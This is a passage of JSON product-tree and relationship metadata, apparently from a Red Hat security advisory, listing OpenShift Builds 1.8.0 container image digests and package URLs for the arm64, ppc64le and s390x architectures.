"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3A77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3Ab662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Ab40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3Ab4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3A27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Af38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3A53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Ad91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3Af6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x as a component of Red Hat OpenShift Builds 1.8.0",
